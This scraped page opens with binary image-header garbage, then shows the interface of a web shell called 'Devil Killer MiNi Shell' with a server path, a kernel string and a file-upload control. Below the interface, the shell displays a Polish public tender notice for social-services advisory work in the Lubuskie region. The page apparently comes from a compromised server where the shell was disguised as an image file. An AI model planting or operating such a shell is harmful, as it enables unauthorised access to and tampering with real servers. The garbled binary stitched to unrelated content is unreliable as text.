JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040946801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie usługi doradztwa specjalistycznego na terenie woj. Lubuskiego w podziale na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Lubuskie – Regionalny Ośrodek Polityki Społecznej w Zielonej Górze</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Województwo Lubuskie – Regionalny Ośrodek Polityki Społecznej w Zielonej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 081048430</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Niepodległości 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-042</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(68) 323 18 80</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@rops.lubuskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://polityka-spoleczna.lubuskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> polityka społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie usługi doradztwa specjalistycznego na terenie woj. Lubuskiego w podziale na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9fece1de-e521-4f38-811e-a3fb33daf848</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00409468</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00073595/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.12 Przeprowadzenie usługi doradztwa specjalistycznego na terenie woj. Lubuskiego w podziale na części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Efekt synergii - koordynacja lubuskiego włączenia społecznego” z Działania 04.13 Wysokiej jakości system włączenia społecznego w ramach Programu Fundusze Europejskie dla Rozwoju Społecznego 2021-2027 współfinansowanego ze środków EFS Plus. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rops_lubuskie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rops_lubuskie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym<br/> a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej przy użyciu Platformy zakupowej<br/> „platformazakupowa.pl” pod adresem: https://platformazakupowa.pl/pn/rops_lubuskie<br/> 2.Postępowanie prowadzone jest w języku polskim. <br/>3.Zamawiający dopuszcza możliwość komunikacji przy użyciu poczty elektronicznej, na adres wskazany w Rozdziale I, z<br/> zastrzeżeniem, że dokumenty, o których mowa w Rozdziale XV ust. 5 oraz Rozdziale VII ust. 1 i 2, składane są wyłącznie za<br/> pośrednictwem Platformy.<br/> 4.W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami,<br/> w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem<br/> https://platformazakupowa.pl/pn/rops_lubuskie i formularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania (wpływu)<br/> oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem<br/> https://platformazakupowa.pl/pn/rops_lubuskie poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi<br/> się komunikat, że wiadomość została wysłana do Zamawiającego.<br/> 5.Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem<br/> https://platformazakupowa.pl/pn/rops_lubuskie . Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu<br/> składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z<br/> obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/> https://platformazakupowa.pl/pn/rops_lubuskie do konkretnego Wykonawcy.<br/> 6.Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/> platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/> trafić do folderu SPAM.<br/> W pozostałym zakresie zgodnie z SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/rops_lubuskie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Dyrektor Regionalnego Ośrodka Polityki Społecznej z siedzibą w Zielonej Górze, przy Al. Niepodległości 36, 65-042 Zielona Góra, tel. 68 3231880, e-mail: sekretariat@rops.lubuskie.pl; <br/>	inspektorem ochrony danych osobowych Regionalnego Ośrodka Polityki Społecznej z siedzibą w Zielonej Górze jest Pani Magda Mierzejewska, kontakt: iod@rops.lubuskie.pl; tel, +48 68 3231925; <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez możliwości negocjacji;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 ze zm.) dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROPS.V.31.2024.WW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Przeprowadzenie usługi doradztwa specjalistycznego na terenie woj. Lubuskiego w podziale na części:<br/>Część A: w zakresie realizacji/rozszerzania usług społecznych przez centrum usług społecznych w wymiarze 110 godzin na terenie województwa lubuskiego dla przedstawicieli gmin i ośrodków pomocy społecznej, które przekształciły się, bądź chcą utworzyć /przekształcić się w CUS;<br/>2. Uczestnikami spotkań doradczych będą przedstawiciele gmin i ośrodków pomocy społecznej, które przekształciły się, bądź chcą utworzyć, czy przekształcić się w CUS.<br/>3. Szczegółowy zakres zadań Wykonawcy: <br/>1) Ustalenie z Zamawiającym szczegółowego programu doradztwa. <br/>2) Przygotowanie materiału merytorycznego w formie prezentacji multimedialnej do prezentowania podczas doradztwa. Przekazanie do akceptacji materiału merytorycznego i prezentacji multimedialnej najpóźniej 5 dni, przed terminem pierwszego spotkania.<br/> 3) Wykonawca jest zobowiązany do zamieszczenia w przygotowanych materiałach, logo projektu „Efekt synergii – koordynacja lubuskiego włączenia społecznego”, Znak Funduszy Europejskich dla Rozwoju Społecznego, Znak barw Rzeczypospolitej Polskiej, Znak Unii Europejskiej złożony z flagi UE i napisu „Dofinansowane przez Unię Europejską”. Szablony prezentacji oraz logotypy przekaże Zamawiający po podpisaniu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru oferty Zamawiający stosować będzie następujące kryteria:<br/>1)	Cena (C) – 70%<br/>2)	Doświadczenie doradcy (D) – 30%<br/>1)	CENA (C) – 70 %<br/>Kryterium to zostanie obliczone na podstawie następującego wzoru:<br/>Cena najtańszej oferty brutto spośród wszystkich badanych ofert <br/>Cena = x 70<br/>Cena badanej oferty brutto <br/>2)	DOŚWIADCZENIE doradcy (D) – 30%<br/>1)	Kryterium „Doświadczenie doradcy” 30% punkty zostaną przyznane w następujący sposób:<br/>Doświadczenie ( ilość godzin )w świadczeniu usług doradztwa/szkoleń, których przedmiotem było: <br/>- przekształcenie ośrodka pomocy społecznej w centrum usług społecznych<br/> i/lub <br/>- doradztwa/szkoleń w zakresie zarządzania i realizacji usług społecznych, o których mowa w art. 2 ust. 1 ustawy z dnia 19 lipca 2019 r. o realizowaniu usług społecznych przez centrum usług społecznych	<br/>Ilość punktów:<br/>50 0 pkt. <br/>51-60 10 pkt. <br/>61-70 20 pkt.<br/>71 i więcej	30	pkt. <br/>Uwaga: informacje w zakresie przedmiotowego kryterium, Wykonawca podaje w formularzu ofertowym, celem ustalenia która oferta uzyskuje najwyższą liczbę punktów w określonych kryteriach oceny ofert oraz – jeśli dotyczy, który Wykonawca zostanie wezwany na podstawie art. 274 ust. 1 ustawy Pzp do przedłożenia podmiotowych środków dowodowych, o których mowa w Rozdziale VII SWZ.<br/>4.	Zamawiający przyzna punkty w tym kryterium na podstawie złożonego przez Wykonawcę w treści Formularza ofertowego oświadczenia w kryterium „Doświadczenie doradcy” –max. 30 pkt.<br/>5.	Ocena złożonych ofert w zakresie zastosowanych kryteriów jakościowych (kryterium nr 2) zostanie dokonana na podstawie informacji wskazanych w treści Załącznika nr 2 do SWZ Formularza oferty - na potwierdzenie spełnienia kryteriów jakościowych.<br/>6.	Nie wypełnienie któregoś z punktów Formularza oferty – Załącznik nr 2A i 2B do SWZ, oraz kolumn tabeli skutkować będzie przyznaniem 0 punktów w kryterium „Doświadczenie doradcy”. <br/>7.	Wykonawca nie może wskazać innych osób w kryterium „Doświadczenie doradcy” w treści Formularza ofertowego i innych osób w celu wykazania spełnienia warunków udziału w postępowaniu. Wskazanie innej osoby w treści „Wykaz osób skierowanych do realizacji przedmiotu zamówienia” – Załącznika nr 7 do SWZ skutkować będzie odrzuceniem oferty. <br/>(przy czym ocena spełnienia warunków udziału dokonana zostanie wstępnie na podstawie złożonego oświadczenia, o którym mowa w Rozdziale V pkt 1 niniejszej SWZ, a następnie– zgodnie z postanowieniem Rozdziału VII SWZ – do złożenia „Wykazu osób” zostanie wezwany ten Wykonawca, którego oferta zostanie najwyżej oceniona). <br/>Wykonawca jest zobowiązany skierować do realizacji zamówienia osobę/y, która podlegała ocenie w kryterium oceny ofert.<br/>Wartość wagowa wyrażona w procentach jest równa wartości wyrażonej w punktach, tj.: 1%=1 pkt.<br/>8.	Oferty oceniane będą punktowo. Maksymalna liczba punktów, jaką po uwzględnieniu kryteriów może osiągnąć oferta wynosi 100 punktów. <br/>9.	Punkty zostaną przyznane wg wzoru S=C+D</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie doradcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Przeprowadzenie usługi doradztwa specjalistycznego na terenie woj. Lubuskiego w podziale na części:<br/>Część B: w zakresie tworzenia i funkcjonowania centrum usług społecznych w wymiarze 110 godzin na terenie województwa lubuskiego dla przedstawicieli gmin i ośrodków pomocy społecznej, które przekształciły się, bądź chcą utworzyć /przekształcić się w CUS<br/>2. Uczestnikami spotkań doradczych będą przedstawiciele gmin i ośrodków pomocy społecznej, które przekształciły się, bądź chcą utworzyć, czy przekształcić się w CUS.<br/>3. Szczegółowy zakres zadań Wykonawcy: <br/>1) Ustalenie z Zamawiającym szczegółowego programu doradztwa. <br/>2) Przygotowanie materiału merytorycznego w formie prezentacji multimedialnej do prezentowania podczas doradztwa. Przekazanie do akceptacji materiału merytorycznego i prezentacji multimedialnej najpóźniej 5 dni, przed terminem pierwszego spotkania.<br/> 3) Wykonawca jest zobowiązany do zamieszczenia w przygotowanych materiałach, logo projektu „Efekt synergii – koordynacja lubuskiego włączenia społecznego”, Znak Funduszy Europejskich dla Rozwoju Społecznego, Znak barw Rzeczypospolitej Polskiej, Znak Unii Europejskiej złożony z flagi UE i napisu „Dofinansowane przez Unię Europejską”. Szablony prezentacji oraz logotypy przekaże Zamawiający po podpisaniu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru oferty Zamawiający stosować będzie następujące kryteria:<br/>1)	Cena (C) – 70%<br/>2)	Doświadczenie doradcy (D) – 30%<br/>1)	CENA (C) – 70 %<br/>Kryterium to zostanie obliczone na podstawie następującego wzoru:<br/>Cena najtańszej oferty brutto spośród wszystkich badanych ofert <br/>Cena = x 70<br/>Cena badanej oferty brutto <br/>2)	DOŚWIADCZENIE doradcy (D) – 30%<br/>1)	Kryterium „Doświadczenie doradcy” 30% punkty zostaną przyznane w następujący sposób:<br/>Doświadczenie ( ilość godzin )w świadczeniu usług doradztwa/szkoleń, których przedmiotem było: <br/>- przekształcenie ośrodka pomocy społecznej w centrum usług społecznych<br/> i/lub <br/>- doradztwa/szkoleń w zakresie zarządzania i realizacji usług społecznych, o których mowa w art. 2 ust. 1 ustawy z dnia 19 lipca 2019 r. o realizowaniu usług społecznych przez centrum usług społecznych	<br/>Ilość punktów:<br/>50 0 pkt. <br/>51-60 10 pkt. <br/>61-70 20 pkt.<br/>71 i więcej	30	pkt. <br/>Uwaga: informacje w zakresie przedmiotowego kryterium, Wykonawca podaje w formularzu ofertowym, celem ustalenia która oferta uzyskuje najwyższą liczbę punktów w określonych kryteriach oceny ofert oraz – jeśli dotyczy, który Wykonawca zostanie wezwany na podstawie art. 274 ust. 1 ustawy Pzp do przedłożenia podmiotowych środków dowodowych, o których mowa w Rozdziale VII SWZ.<br/>4.	Zamawiający przyzna punkty w tym kryterium na podstawie złożonego przez Wykonawcę w treści Formularza ofertowego oświadczenia w kryterium „Doświadczenie doradcy” –max. 30 pkt.<br/>5.	Ocena złożonych ofert w zakresie zastosowanych kryteriów jakościowych (kryterium nr 2) zostanie dokonana na podstawie informacji wskazanych w treści Załącznika nr 2 do SWZ Formularza oferty - na potwierdzenie spełnienia kryteriów jakościowych.<br/>6.	Nie wypełnienie któregoś z punktów Formularza oferty – Załącznik nr 2A i 2B do SWZ, oraz kolumn tabeli skutkować będzie przyznaniem 0 punktów w kryterium „Doświadczenie doradcy”. <br/>7.	Wykonawca nie może wskazać innych osób w kryterium „Doświadczenie doradcy” w treści Formularza ofertowego i innych osób w celu wykazania spełnienia warunków udziału w postępowaniu. Wskazanie innej osoby w treści „Wykaz osób skierowanych do realizacji przedmiotu zamówienia” – Załącznika nr 7 do SWZ skutkować będzie odrzuceniem oferty. <br/>(przy czym ocena spełnienia warunków udziału dokonana zostanie wstępnie na podstawie złożonego oświadczenia, o którym mowa w Rozdziale V pkt 1 niniejszej SWZ, a następnie– zgodnie z postanowieniem Rozdziału VII SWZ – do złożenia „Wykazu osób” zostanie 